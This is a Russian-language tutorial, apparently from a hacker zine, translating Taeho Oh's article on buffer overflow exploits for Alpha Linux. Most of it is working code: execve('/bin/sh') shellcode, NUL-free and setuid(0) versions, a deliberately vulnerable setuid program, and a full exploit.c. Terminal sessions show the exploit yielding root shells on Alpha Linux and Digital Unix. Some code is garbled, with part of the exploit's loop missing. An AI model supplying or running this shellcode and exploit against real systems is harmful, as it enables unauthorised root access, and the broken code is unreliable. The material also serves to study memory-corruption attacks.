+-----------------------------------------------------------------------------------------------------------------------------------------------[CP #2]----+
|
|
|
|
|
|
|
  _|_| _|_|         _|  _|    _|_|_|
_|     _|  _|     _|_|_|_|_|  _|  _|
_| ODE _|_|         _|  _|      _|  
_|     _| IMPS    _|_|_|_|_|  _|    
    _|_| _|           _|  _|    _|_|_|  
|
|
|
|
|
|
|
+-------------------------------------------------------------------------------------------------------------------------------------------------------------+
+--------------------[2x04 Buffer overflow exploit in the alpha linux (/home/cp2/hack/eXploit_alpha_linux)]-------------------+
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|

       Эксплойт на переполнение буфера для alpha Linux.
        -=============================================-
          Автор: Таехо Ох (Taeho Oh) \\ [email protected]
1. Вступление
Существует различные эксплойты под переполнение буфера. Как правило, все они работают только на платформе intel x86 linux. Данная статья показывает метод написания эксплойта под alpha linux.



2. Что нужно знать перед прочтением?
Вы должны знать языки ассемблер и Си, так же систему Linux. Конечно, должны быть знания о переполнении буфера. Вы можете взять эту информацию из журнала Phrack 49-14 ("Smashing The Stack For Fun And Profit" автор:Aleph1). Это прекрасная статья о переполнении буфера и я настоятельно рекомендую прочитать ее перед тем, как читать дальше.



3. Регистры в alpha linux
Вы должны знать регистры alpha перед написанием шеллкода. =) Все регистры 64 битные.
Регистры alpha
----------------------------------------------------------------------------
$0  v0
$1  t0
$2  t1
$3  t2
$4  t3
$5  t4
$6  t5
$7  t6
$8  t7
$9  s0
$10 s1
$11 s2
$12 s3
$13 s4
$14 s5
$15 fp
$16 a0
$17 a1
$18 a2
$19 a3
$20 a4
$21 a5
$22 t8
$23 t9
$24 t10
$25 t11
$26 ra
$27 t12
$28 at
$29 gp
$30 sp
$31 zero
$32 pc
$33 vfp
----------------------------------------------------------------------------


4. Напишем примерный шеллкод
Сейчас напишем примерный шеллкод. Пока можете не думать о символе '\0', потому что вы можете удалить его позже.
shellcodeasm.c
----------------------------------------------------------------------------
#include
main()
{
  char *name[2];
  name[0]="/bin/sh";
  name[1]=NULL;
  execve(name[0],name,NULL);
}
----------------------------------------------------------------------------

compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o shellcodeasm -static shellcodeasm.c
[ ohhara@ohhara ~ ] {2} $ gdb shellcodeasm
GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "alpha-redhat-linux"...
(gdb) disassemble main
Dump of assembler code for function main:
0x1200001e8 
: ldah gp,18(t12) 0x1200001ec : lda gp,30704(gp) 0x1200001f0 : lda sp,-32(sp) 0x1200001f4 : stq ra,0(sp) 0x1200001f8 : stq fp,8(sp) 0x1200001fc : mov sp,fp 0x120000200 : ldq t0,-30952(gp) 0x120000204 : stq t0,16(fp) 0x120000208 : stq zero,24(fp) 0x12000020c : ldq a0,16(fp) 0x120000210 : addq fp,0x10,a1 0x120000214 : clr a2 0x120000218 : ldq t12,-32456(gp) 0x12000021c : jsr ra,(t12),0x120007180 <__execve> 0x120000220 : ldah gp,18(ra) 0x120000224 : lda gp,30648(gp) 0x120000228 : mov fp,sp 0x12000022c : ldq ra,0(sp) 0x120000230 : ldq fp,8(sp) 0x120000234 : addq sp,0x20,sp 0x120000238 : ret zero,(ra),0x1 End of assembler dump. (gdb) disassemble execve Dump of assembler code for function __execve: 0x120007180 <__execve>: lda v0,59(zero) 0x120007184 <__execve+4>: callsys 0x120007188 <__execve+8>: bne a3,0x120007190 <__execve+16> 0x12000718c <__execve+12>: ret zero,(ra),0x1 0x120007190 <__execve+16>: br gp,0x120007194 <__execve+20> 0x120007194 <__execve+20>: ldah gp,18(gp) 0x120007198 <__execve+24>: lda gp,2116(gp) 0x12000719c <__execve+28>: ldq t12,-31592(gp) 0x1200071a0 <__execve+32>: jmp zero,(t12),0x120007738 <__syscall_error> End of assembler dump. (gdb) ----------------------------------------------------------------------------
Теперь вы можете понять условия запуска "/bin/sh".
Для выполнения "/bin/sh"
----------------------------------------------------------------------------
a0($16) = адрес "/bin/sh\0"
a1($17) = адрес адреса "/bin/sh\0"
a2($18) = 0
v0($0) = 59
callsys
----------------------------------------------------------------------------
Зная эту информацию, вы можете без труда написать шеллкод.
testsc1.c
----------------------------------------------------------------------------
char shellcode[]=
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
  "\x12\x04\xff\x47"      /* clr $18                      */
  "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
  "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
  "\x68\x00\x7f\x26"      /* ldah $19,0x0068($31)         */
  "\x2f\x73\x73\x22"      /* lda $19,0x732f($19)          */
  "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
  "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
  "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
  "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
  "\x3b\x00\x1f\x20"      /* lda $0,59($31)               */
  "\x83\x00\x00\x00";     /* callsys                      */

typedef void (*F)();

main()
{
  F fp;
  fp=(F)(&shellcode);
  fp();
}
----------------------------------------------------------------------------
Вас может испугать представленный код. Не переживайте. Каждая линия имеет пояснение =)
testsc1.c shellcode line by line explanation
----------------------------------------------------------------------------
char shellcode[]=

  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  /* $16 = $30 - 200                                      */
  /* $30 is stack pointer. To point "/bin/sh\0",          */
  /* shellcode needs free memory space. $30 - 200 may be  */
  /* free. :) "/bin/sh\0" character string will be stored */
  /* in the $30 - 200 address. To execute "/bin/sh", $16  */
  /* have to point to "/bin/sh\0"                         */
  /* The 'q' of the 'subq' means 64 bit.                  */

  "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
  /* $17 = $30 - 192                                      */
  /* To execute "/bin/sh", $17 have to point to the       */
  /* address of "/bin/sh\0". The address of "/bin/sh\0"   */
  /* will be stored in the $30 - 192 address.             */

  "\x12\x04\xff\x47"      /* clr $18                      */
  /* Clear $18 register. To execute "/bin/sh" $18         */
  /* register must be 0.                                  */

  "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
  /* Store the address of "/bin/sh\0" in the $30 - 192    */
  /* address.                                             */

  "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
  /* Make 0 in the address of $30 - 184.                  */

  "\x68\x00\x7f\x26"      /* ldah $19,0x0068($31)         */
  /* $19 = 0x00680000                                     */
  /* $31 is always 0                                      */

  "\x2f\x73\x73\x22"      /* lda $19,0x732f($19)          */
  /* $19 = 0x0068732f                                     */
  /* $19 = "/sh\0"                                        */
  /* Because alpha is little endian.                      */

  "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
  /* Store $19 in $30 - 196 address.                      */
  /* $30 - 196 = "/sh\0"                                  */
  /* The 'l' of the 'stl' means 32 bit                    */

  "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
  /* $19 = 0x6e690000                                     */

  "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
  /* $19 = 0x6e69622f                                     */
  /* $19 = "/bin"                                         */

  "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
  /* Store $19 in $30 - 200 address.                      */
  /* $30 - 200 = "/bin"                                   */

  "\x3b\x00\x1f\x20"      /* lda $0,59($31)               */
  /* $0 = 59                                              */
  /* To execute "/bin/sh" $0 must be 59                   */

  "\x83\x00\x00\x00";     /* callsys                      */
  /* System call                                          */
  /* Execute "/bin/sh"                                    */
----------------------------------------------------------------------------
Скомпилируем и запустим testsc1.c
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc testsc1.c -o testsc1
[ ohhara@ohhara ~ ] {2} $ ./testsc1
bash$
----------------------------------------------------------------------------
Итак, у нас есть шеллкод для alpha linux. Конечно, мы не сможем использовать его в эксплойтах. Потому что, шеллкод имеет очень много символов '\0'. Вы должны удалить все символы '\0' для переполнения буфера.



5. Попытка убрать '\0' в шеллкоде.

Вы можете убрать символы '\0' если изменените инструкцию.
remove '\0' character
----------------------------------------------------------------------------
from

"\x68\x00\x7f\x26"      /* ldah $19,0x0068($31)         */
"\x2f\x73\x73\x22"      /* lda $19,0x732f($19)          */

to

"\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
"\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
"\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
----------------------------------------------------------------------------
Один символ '\0' удален.
----------------------------------------------------------------------------
from

"\x3b\x00\x1f\x20"      /* lda $0,59($31)               */

to

"\x13\x94\xe7\x43"      /* addq $31,60,$19              */
"\x20\x35\x60\x42"      /* subq $19,1,$0                */
----------------------------------------------------------------------------
Два удалены.
Получившийся шеллкод
----------------------------------------------------------------------------
char shellcode[]=
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
  "\x12\x04\xff\x47"      /* clr $18                      */
  "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
  "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
  "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
  "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
  "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
  "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
  "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
  "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
  "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
  "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
  "\x20\x35\x60\x42"      /* subq $19,1,$0                */
  "\x83\x00\x00\x00";     /* callsys                      */
----------------------------------------------------------------------------
компилируем и запускаем testsc2.c
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc testsc2.c -o testsc2
[ ohhara@ohhara ~ ] {2} $ ./testsc2
bash$
----------------------------------------------------------------------------
Этого мало для шеллкода. Потому что, инструкции вызовов должны использоваться для запуска "/bin/sh", и вызовы содержат 3 символа '\0'. Вы должны модифицировать шеллкод.



6. Попытка удалить ВСЕ символы '\0' из шеллкода
конечный шеллкод
----------------------------------------------------------------------------
char shellcode[]=
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  /* $16 = $30 - 200
  /* $16 must have the shellcode address. However, before */
  /* the bsr instruction, $16 can't have the address.     */
  /* This instruction just store the meaningless address. */
  /* The all instruction before bsr are meaningless.      */

  "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
  /* $17 = 0 or 0x83                                      */
  /* $17 = 0x83                                           */

  "\x12\x94\x07\x42"      /* addq $16,60,$18              */
  "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
  /* $17("\x83\x00\x00\x00") is stored in $16 + 60 - 4    */
  /* address.                                             */
  /* ( "\xff\xff\xff\xff" -> "\x83\x00\x00\x00" )         */

  "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
  "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
  /* $17 = "\x1f\x04\xff\x47"                             */
  /* "\x1f\x04\xff\x47" is nop instruction.               */

  "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
  /* change "bsr $16,-28" instruction" into nop           */
  /* instruction to pass through the bsr instruction.     */
  /* ( "\xf9\xff\x1f\xd2" -> "\x1f\x04\xff\x47" )         */

  "\xf9\xff\x1f\xd2"      /* bsr $16,-28                  */
  /* Jump to "bis $31,0x83,$17" and store the current     */
  /* address in the $16.                                  */
  /* After jump, this insturction will be changed into    */
  /* nop instruction.                                     */

  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
  "\x12\x04\xff\x47"      /* clr $18                      */
  "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
  "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
  "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
  "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
  "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
  "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
  "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
  "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
  "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
  "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
  "\x20\x35\x60\x42"      /* subq $19,1,$0                */

  "\xff\xff\xff\xff";     /* callsys ( disguised )        */
  /* This will be changed to "\x83\x00\x00\x00"           */
----------------------------------------------------------------------------
собираем и запускаем testsc3.c
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc testsc3.c -o testsc3
[ ohhara@ohhara ~ ] {2} $ ./testsc3
bash$
----------------------------------------------------------------------------



7. Вставка setuid(0) кода в шеллкод

Вы не получите root-шелл при использовании вышего шеллкода. Вы должны вставить setuid(0) код в шеллкод.
setuidasm.c
----------------------------------------------------------------------------
main()
{
  setuid(0);
}
----------------------------------------------------------------------------
компилируем и дизассемблим
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c
[ ohhara@ohhara ~ ] {2} $ gdb setuidasm
GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "alpha-redhat-linux"...
(gdb) disassemble main
Dump of assembler code for function main:
0x1200001e8 
: ldah gp,18(t12) 0x1200001ec : lda gp,30696(gp) 0x1200001f0 : lda sp,-16(sp) 0x1200001f4 : stq ra,0(sp) 0x1200001f8 : stq fp,8(sp) 0x1200001fc : mov sp,fp 0x120000200 : clr a0 0x120000204 : ldq t12,-31056(gp) 0x120000208 : jsr ra,(t12),0x120007180 <__setuid> 0x12000020c : ldah gp,18(ra) 0x120000210 : lda gp,30660(gp) 0x120000214 : mov fp,sp 0x120000218 : ldq ra,0(sp) 0x12000021c : ldq fp,8(sp) 0x120000220 : addq sp,0x10,sp 0x120000224 : ret zero,(ra),0x1 End of assembler dump. (gdb) disassemble setuid Dump of assembler code for function __setuid: 0x120007180 <__setuid>: lda v0,23(zero) 0x120007184 <__setuid+4>: callsys 0x120007188 <__setuid+8>: bne a3,0x120007190 <__setuid+16> 0x12000718c <__setuid+12>: ret zero,(ra),0x1 0x120007190 <__setuid+16>: br gp,0x120007194 <__setuid+20> 0x120007194 <__setuid+20>: ldah gp,18(gp) 0x120007198 <__setuid+24>: lda gp,2108(gp) 0x12000719c <__setuid+28>: ldq t12,-31600(gp) 0x1200071a0 <__setuid+32>: jmp zero,(t12),0x120007738 <__syscall_error> End of assembler dump. (gdb) ---------------------------------------------------------------------------- Для setuid(0) ---------------------------------------------------------------------------- a0($16) = 0 v0($0) = 23 callsys ----------------------------------------------------------------------------
Это содержит системные вызовы. Вы так же должны удалить символы '\0' в setuid(0) коде.
testsc4.c
----------------------------------------------------------------------------
char shellcode[]=
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
  "\x12\x14\x02\x42"      /* addq $16,16,$18              */
  "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
  "\x12\x94\x09\x42"      /* addq $16,76,$18              */
  "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
  "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
  "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
  "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
  "\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */
  "\x10\x04\xff\x47"      /* clr $16                      */
  "\x11\x14\xe3\x43"      /* addq $31,24,$17              */
  "\x20\x35\x20\x42"      /* subq $17,1,$0                */
  "\xff\xff\xff\xff"      /* callsys ( disguised )        */
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
  "\x12\x04\xff\x47"      /* clr $18                      */
  "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
  "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
  "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
  "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
  "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
  "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
  "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
  "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
  "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
  "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
  "\x20\x35\x60\x42"      /* subq $19,1,$0                */
  "\xff\xff\xff\xff";     /* callsys ( disguised )        */

typedef void (*F)();

main()
{
  F fp;
  fp=(F)(&shellcode);
  fp();
}
----------------------------------------------------------------------------
Если вы полностью читали статью, то вы догадаетесь, что делает testsc4.c :)
компилируем и запускаем testsc4.c
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc testsc4.c -o testsc4
[ ohhara@ohhara ~ ] {2} $ ./testsc4
bash$
----------------------------------------------------------------------------



8. Эксплойт для уязвимой setuid root программы

Вы можете исследовать классическую уязвимую программу в alpha linux. Это пример:
vulnerable.c
----------------------------------------------------------------------------
#include
#include

void vulfunc(char *buf)
{
  char localbuf[1024];
  strcpy(localbuf+1,buf);
}

main(int argc,char **argv)
{
  if(argc>1)
    vulfunc(argv[1]);
}
----------------------------------------------------------------------------
Вы не можете изменить адрес возврата для функции vulfunc. Когда вы пробуете переполнить localbuf в vulfunc, вы можете изменить адрес возврата в функции main. (что подобно стэку в sparc.) Потому что localbuf записана после адреса возврата для vulfunc. Для intel x86 locabuf записывается перед адресом возврата для vulfunc. На intel x86 localbuf может изменить адресс возврата для vulfunc. Однако, в alpha, localbuf не может изменить адресс возврата для функции vulfunc, а может изменить адресс для main.

Для запуска код должен быть хорошо расположен. Например, инструкция может быть помещена в 0x120000000 и 0x120000004 и не может быть в 0x120000001, 0x120000002, и 0x120000003.

Адреса в alpha 64 битны. Адресс содержит множество символов '\0'. Вы не можете вставить несколько адресов возврата в буфер. Вы должны положить его лишь однажды. Итак, вы должны знать расположение адреса возврата точно. Его не сложно найти, потому что он решается при компиляции.
exploit.c 
----------------------------------------------------------------------------
#include
#include

#define OFFSET                            0
#define ALIGN                             3     /* 0, 1, 2, 3           */
#define RET_POSITION                   1028     /* 0, 4, 8, 12, . . .   */
#define NOP              "\x1f\x04\xff\x47"           

char shellcode[]=
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
  "\x12\x14\x02\x42"      /* addq $16,16,$18              */
  "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
  "\x12\x94\x09\x42"      /* addq $16,76,$18              */
  "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
  "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
  "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
  "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
  "\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */
  "\x10\x04\xff\x47"      /* clr $16                      */
  "\x11\x14\xe3\x43"      /* addq $31,24,$17              */
  "\x20\x35\x20\x42"      /* subq $17,1,$0                */
  "\xff\xff\xff\xff"      /* callsys ( disguised )        */
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
  "\x12\x04\xff\x47"      /* clr $18                      */
  "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
  "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
  "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
  "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
  "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
  "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
  "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
  "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
  "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
  "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
  "\x20\x35\x60\x42"      /* subq $19,1,$0                */
  "\xff\xff\xff\xff";     /* callsys ( disguised )        */

unsigned long get_sp(void)
{
  __asm__("bis $31,$30,$0");
}

int main(int argc,char **argv)
{
  char buff[RET_POSITION+8+ALIGN+1],*ptr;
  char *nop;
  int offset=OFFSET,bsize=RET_POSITION+8+ALIGN+1;
  unsigned long sp,addr;
  int i;

  if(argc>1)
    offset=atoi(argv[1]);

  nop=NOP;

  for(i=0;i>8;
  buff[RET_POSITION+ALIGN+2]=(addr&0x0000000000ff0000)>>16;
  buff[RET_POSITION+ALIGN+3]=(addr&0x00000000ff000000)>>24;
  buff[RET_POSITION+ALIGN+4]=(addr&0x000000ff00000000)>>32;
  buff[RET_POSITION+ALIGN+5]=(addr&0x0000ff0000000000)>>40;
  buff[RET_POSITION+ALIGN+6]=(addr&0x00ff000000000000)>>48;
  buff[RET_POSITION+ALIGN+7]=(addr&0xff00000000000000)>>56;

  buff[bsize-1]='\0';

  printf("Jump to 0x%016x\n",addr);
  
  execl("./vulnerable","vulnerable",buff,NULL);
}
----------------------------------------------------------------------------


Эксплойт для уязвимой программы в alpha linux
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ uname -a
Linux ohhara.postech.ac.kr 2.0.35 #11 Mon Oct 19 22:58:15 EDT 1998 alpha unknown
[ ohhara@ohhara ~ ] {2} $ ls -l vulnerable
-rwsr-xr-x   1 root     root        13906 Nov 13 14:55 vulnerable*
[ ohhara@ohhara ~ ] {3} $ ls -l exploit
-rwxrwxr-x   1 ohhara   ohhara      15541 Nov 13 18:22 exploit*
[ ohhara@ohhara ~ ] {4} $ ./exploit
Jump to 0x000000001ffff6c8
Illegal instruction
[ ohhara@ohhara ~ ] {5} $ ./exploit 400
Jump to 0x000000001ffff530
bash# whoami
root
bash#
----------------------------------------------------------------------------


Эксплойт для уязвимой программы в digital unix
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ uname -a
OSF1 monsky.postech.ac.kr V4.0 464 alpha
[ ohhara@ohhara ~ ] {2} $ ls -l vulnerable
-rwsr-xr-x   1 root     system     24576 Nov 13 20:31 vulnerable*
[ ohhara@ohhara ~ ] {3} $ ls -l exploit
-rwxr-xr-x   1 ohhara   system     24576 Nov 13 20:31 exploit*
[ ohhara@ohhara ~ ] {4} $ ./exploit
Jump to 0x000000001ffff030
# whoami
root
#
----------------------------------------------------------------------------
the buffer overflow data
----------------------------------------------------------------------------
    0  61 61 61 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      aaa...G...G...G.
   16  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
   32  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
   48  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
   64  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
   80  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
   96  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  112  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  128  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  144  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  160  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  176  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  192  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  208  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  224  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  240  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  256  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  272  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  288  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  304  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  320  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  336  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  352  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  368  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  384  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  400  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  416  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  432  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  448  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  464  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  480  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
